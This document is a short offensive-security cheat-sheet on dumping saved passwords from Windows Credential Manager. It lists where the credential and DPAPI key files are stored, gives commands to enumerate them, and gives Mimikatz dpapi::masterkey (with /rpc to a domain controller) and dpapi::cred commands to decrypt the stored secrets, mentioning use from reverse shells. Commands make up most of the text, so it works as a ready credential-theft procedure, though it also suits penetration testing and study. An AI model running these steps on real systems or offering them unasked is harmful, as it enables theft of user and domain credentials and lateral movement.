Dumping Passwords from Windows Credential Manager
Credential Enumeration
cmdkey /list
In reverse shells, I have noticed that it's impossible to spawn processes using runas.exe /savecred /user:DOMAIN\username
if the credential is stored in Windows Credential Manager.
That said, we may still be able to dump the password using the Mimikatz dpapi
module, which is how these credentials are protected.
Common Locations for Cached Credentials
# Legacy CMD Environment Variable
"%USERPROFILE%\AppData\Local\Microsoft\Credentials"
"%USERPROFILE%\AppData\Roaming\Microsoft\Credentials"
# PowerShell Environment Variable
"$env:USERPROFILE\AppData\Local\Microsoft\Credentials"
"$env:USERPROFILE\AppData\Roaming\Microsoft\Credentials"
ls -r -h ~\AppData\Local\Microsoft\Credentials\ | select -expand fullname
ls -r -h ~\AppData\Roaming\Microsoft\Credentials\ | select -expand fullname
Enumerate any stored credentials
Common Locations for Encryption Keys
# Legacy CMD Envrionment Variables
"%USERPROFILE%\AppData\Local\Microsoft\Protect"
"%USERPROFILE%\AppData\Roaming\Microsoft\Protect"
# PowerShell Environment Variables
"$env:USERPROFILE\AppData\Local\Microsoft\Protect"
"$env:USERPROFILE\AppData\Roaming\Microsoft\Protect"
ls -r -h ~\AppData\Roaming\Microsoft\Protect\ | select -expand fullname
Enumerate any stored keys
Use Mimikatz to Unprotect DPAPI Data
Cache Master Keys
mimikatz # dpapi::masterkey /in:C:\Users\user_name\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\191d3f9d-7959-4b4d-a520-a444853c47eb /rpc
mimikatz # dpapi::masterkey /in:C:\Users\user_name\AppData\Roaming\Microsoft\Protect\S-1-5-21-1199398058-4196589450-691661856-1107\10811601-0fa9-43c2-97e5-9bef8471fc7d /rpc
mimikatz # dpapi::cache
Make RPC call to domain controller to retrieve master key when password is unknown
Unprotect Cached Credentials
mimikatz # dpapi::cred /in:C:\Users\user_name\AppData\Roaming\Microsoft\Credentials\84F1CAEEBF466550F4967858F9353FB4
Go through each cached credential file and attempt to unprotect it using the cached encryption keys
References
https://www.thehacker.recipes/ad/movement/credentials/dumping/dpapi-protected-secrets
https://tools.thehacker.recipes/mimikatz/modules/dpapi/masterkey
https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials